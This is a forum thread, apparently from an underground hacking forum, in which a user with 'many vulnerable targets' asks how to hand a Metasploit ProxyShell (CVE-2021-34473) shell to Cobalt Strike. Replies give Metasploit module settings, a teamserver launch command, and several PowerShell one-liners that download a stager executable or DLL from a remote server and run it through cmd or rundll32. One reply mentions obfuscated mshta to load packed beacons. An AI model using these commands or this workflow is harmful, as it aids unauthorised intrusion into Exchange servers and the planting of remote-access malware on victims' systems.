PrivEsc Proxyshell CVE-2021-34473. MSFConsole > Cobalt Strike

[notactive]

Is anyone here familiar with passing msfconsole shell to cobalt strike using the Proxy-shell CVE-2021-34473?
I have many vulnerable targets that I want to test on. If intressted and can help me out write me a message.

This is what I tried:

MSFConsole

sudo systemctl start postgresql
msfdb init
msfconsole

use exploit/windows/http/exchange_proxyshell_rce
set payload windows/x64/meterpreter/reverse_http(s?)
set RHOSTS [targetIP]
set RPORT 443 (default)
set LHOST [Cobalt Strikes IP or hostname]
set DisablePayloadHandler true
set PrependMigrate true
set AllowNoCleanup true

After setting up Metasploit, I fired up my Cobalt Session

Cobalt Strike

./teamserver [Cobalt Strikes IP or hostname] [password] [profile]

(I left the default listener on `50050`)

the listener of Cobalt Strike I am not really sure. I added a simple listener (for example on port 443 or 80). When exploit the target (exploit -j), it says: Exploit completed. But no session created.

Do I need to change / adjust something else in this graph?

RHOSTS <targetIP>

   RPORT              443 (default)
   SRVHOST         ??
   SRVPORT         8080 (default)

Payload options (windows/x64/meterpreter/reverse_http):

   LHOST     [Cobalt Strikes IP or hostname]
   LPORT     50050  (default cobalt listener (or change?)

or what should I do with my added listener in cobalt strike?

 

[RocketRacoon]

Hello buddy, when this exploit went public I used this command, but not with metasploit but directly using autoproxylogon

GitHub - Udyz/Automatic-Proxylogon-Exploit: Automatic OWA Proxylogon Exploit

Automatic OWA Proxylogon Exploit. Contribute to Udyz/Automatic-Proxylogon-Exploit development by creating an account on GitHub.

github.com

after you get the shell, you should use somenthing like this

Invoke-Command { Invoke-WebRequest -URI ‘http://2.xx.xx.x0:80/download/lync.exe’ -Outfile ‘C:\Files\lync.exe’; Invoke-Expression -Command “cmd.exe /c c:\files\lync.exe” }

on the shell you just got, and that should be enough to get your cs session send me your tox in private we might could exchange some knowlodge

 

[yixfwe]

кастомить пейлоад там надо

 

[IIIIXX]

ты не по этому ману делаешь?)

Interoperability with the Metasploit Framework | Cobalt Strike

They are separate entities, but there is a lot of synergy between Cobalt Strike and the Metasploit Framework. Learn how to use them together.

www.cobaltstrike.com

мне показалось там нету того что тебе нужно, думаю проще поменять тип пейлоада
set payload cmd/windows/generic
или
set payload windows/x64/exec
дальше
set cmd command

вместо command в твоем случае можно использовать что то типа того что дал выше RocketRacoon , ну например так
cmd.exe /c "powershell -command ""Invoke-WebRequest -URI 'http://2.xx.xx.x0:80/cobaltstager.exe' -Outfile 'C:\programdata\cobaltstager.exe'; Invoke-Expression -Command 'cmd.exe /c C:\programdata\lync.exe'"""

В данном примере cobaltstager.exe твой пейлоад, а 2.xx.xx.x0 вебсервер с которого он качается

 

[notactive]

ты не по этому ману делаешь?)

мне показалось там нету того что тебе нужно, думаю проще поменять тип пейлоада
set payload cmd/windows/generic
или
set payload windows/x64/exec
дальше
set cmd command

вместо command в твоем случае можно использовать что то типа того что дал выше RocketRacoon , ну например так
cmd.exe /c "powershell -command ""Invoke-WebRequest -URI 'http://2.xx.xx.x0:80/cobaltstager.exe' -Outfile 'C:\programdata\cobaltstager.exe'; Invoke-Expression -Command 'cmd.exe /c C:\programdata\lync.exe'"""

В данном примере cobaltstager.exe твой пейлоад, а 2.xx.xx.x0 вебсервер с которого он качается

I see that a lot of people use the command you provided me with:

cmd.exe /c "powershell -command ""Invoke-WebRequest -URI ' http://2.xx.xx.x0:80/cobaltstager.exe ' -Outfile 'C:\programdata\cobaltstager.exe'; Invoke-Expression -Command 'cmd.exe /c C:\programdata\lync.exe'"""

this failed me many times, so i did this:
```
Set-ExecutionPolicy Unrestricted

- Invoke-WebRequest -Uri http://<SRV-IP>/serviceversion.dll -OutFile serviceversion.dll
- rundll32.exe serviceversion, Start
```

this command works good.

 

[wiseguy01]

what I do when I get a cmd reverse shell ith ms17-010 with msf or pw code, I then execute custom obfuscated mshta command to execute themida cs.
BTW i do not use latest CS, maybe will buy, I just got out.
you don't link MSF to CS for reverse shell or meterpreter to load beacon you load meterpreter's MSF server then load beacon thru that session!